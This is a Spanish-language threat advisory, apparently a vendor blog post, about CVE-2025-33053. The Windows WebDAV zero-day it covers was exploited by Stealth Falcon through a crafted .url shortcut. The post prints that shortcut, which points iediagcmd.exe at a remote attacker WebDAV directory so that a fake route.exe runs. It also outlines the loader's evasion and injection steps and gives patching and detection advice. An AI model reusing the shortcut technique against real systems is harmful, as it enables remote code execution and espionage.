De vez en cuando, los hackers encuentran formas ingeniosas de entrar. En esta ocasión, se trató de una función de WebDAV en Windows, una vulnerabilidad de día cero que se coló entre las actualizaciones. Y es grave. La CVE-2025-33053 ofreció a los ciberespías una ruta de un solo clic para instalar malware en los sistemas objetivo. Analicemos qué sucedió y por qué es importante.

¿Qué sucedió?

El 10 de junio de 2025, Microsoft parcheó una falla de día cero en WebDAV. Un grupo APT conocido como Stealth Falcon (también conocido como FruityArmor) la estaba utilizando activamente en Oriente Medio.

Stealth Falcon utilizaba un archivo .url modificado. Si la víctima hacía clic en él, se iniciaba la herramienta de diagnóstico de Windows Internet Explorer (iediagcmd.exe). En lugar de ejecutar herramientas legítimas, ejecutaba malware alojado en un servidor WebDAV malicioso.

¿Por qué WebDAV?

WebDAV extiende HTTP, lo que permite que las aplicaciones se vinculen o administren archivos remotos. Windows aún lo admite, especialmente a través de las herramientas de IE y algunas aplicaciones. Aquí es donde entra en juego iediagcmd.exe. Es confiable y sigue activo en Windows moderno, incluso después de que IE fuera retirado.

El archivo .url tenía este aspecto:

[Acceso directo a Internet]

URL=C:\Archivos de programa\Internet Explorer\iediagcmd.exe

WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr

Al configurar la carpeta de trabajo en el servidor WebDAV, el exploit engañó a Windows para que cargara archivos ejecutables desde ese servidor en lugar de system32. Se ejecutaba un route.exe falso en lugar del route.exe real.

La cadena de infección

Una vez que iediagcmd ejecutaba route.exe desde el servidor del atacante, comenzaba el verdadero problema. Aquí se describe la cadena:

Horus Loader: Un cargador de C++ altamente ofuscado mediante Code Virtualizer. Se protegía de la ingeniería inversa. Tecnología antianálisis: El cargador asignaba manualmente las DLL clave y verificaba los procesos en ejecución en busca de herramientas de seguridad. Podía detenerse automáticamente si existían defensas.

PDF señuelo: Los usuarios veían un PDF falso. Se descifraba en memoria y se abría desde %temp%, mientras el cargador ejecutaba malware en segundo plano.

IPfuscation: El implante real se ocultaba como direcciones IPv6 y se convertía en memoria a shellcode.

Inyección de proceso: Se creaba un proceso del navegador (msedge.exe) en modo suspendido, se inyectaba la carga útil y luego se reanudaba.

Esa carga útil final era el "Agente Horus". Un implante personalizado basado en el framework Mythic. Podía:

Identificar el sistema

Inyectar shellcode

Listar archivos

Exfiltrar datos

Comunicarse con un servidor C2 remoto

Stealth Falcon lo utilizaba con cautela, avanzando solo si el objetivo merecía la pena.

El panorama de amenazas

Esto es más que un ejercicio de laboratorio. CISA marcó CVE-2025-33053 como "explotado conocido". Microsoft parcheó no solo los sistemas modernos, sino también los antiguos Windows Server 2012 y Windows 8, lo que indica una urgencia real.

Kaspersky lo calificó como uno de los peores errores de la lista de parches del martes de junio de 2025, con una puntuación alta (8.8), y los ataques en vivo lo convierten en una prioridad máxima de parche.

Está vinculado al espionaje dirigido a Turquía, Catar, Egipto, Yemen y posiblemente a sistemas militares y gubernamentales. DarkReading enfatizó su capacidad de un solo clic: basta con abrir un archivo .url y listo.

Por qué funcionó

Varias condiciones hicieron que este exploit fuera poderoso:

Herramientas confiables: Los atacantes se aprovecharon de utilidades legítimas de Windows.

Carga remota de DLL/ejecutables: WebDAV les permitió eludir la protección local.

Entrega con un solo clic: El phishing fue suficiente.

Cargadores complejos y evasión: El código permaneció oculto mediante ofuscación, cargas útiles cifradas, IPfuscation e inyección de procesos. Stealth Falcon demostró sofisticación y moderación al implementar puertas traseras completas solo cuando era necesario.

Qué deben hacer los usuarios y administradores:

Aplicar el parche inmediatamente. La actualización de junio de Microsoft cubre la falla incluso en sistemas antiguos.

Interrumpir WebDAV hasta que se aplique el parche; deshabilitar el servicio WebClient o bloquear los puertos 80/443.

Utilizar herramientas de seguridad que detecten cargas anormales de DLL, carpetas de trabajo sospechosas o comportamientos de inyección.

Capacitar al personal: No hacer clic en archivos adjuntos .url desconocidos.

Estar atento a anomalías: Nuevos procesos iniciados desde %temp%, cargas extrañas de DLL, llamadas de red sospechosas.

Cómo ayuda Vicarius:

Aquí es donde interviene Vicarius. Nuestro equipo lanzó un script de detección diseñado específicamente para CVE-2025-33053. Busca indicios de uso indebido de WebDAV, como entradas extrañas en el directorio de trabajo o la generación de iediagcmd.exe desde carpetas remotas.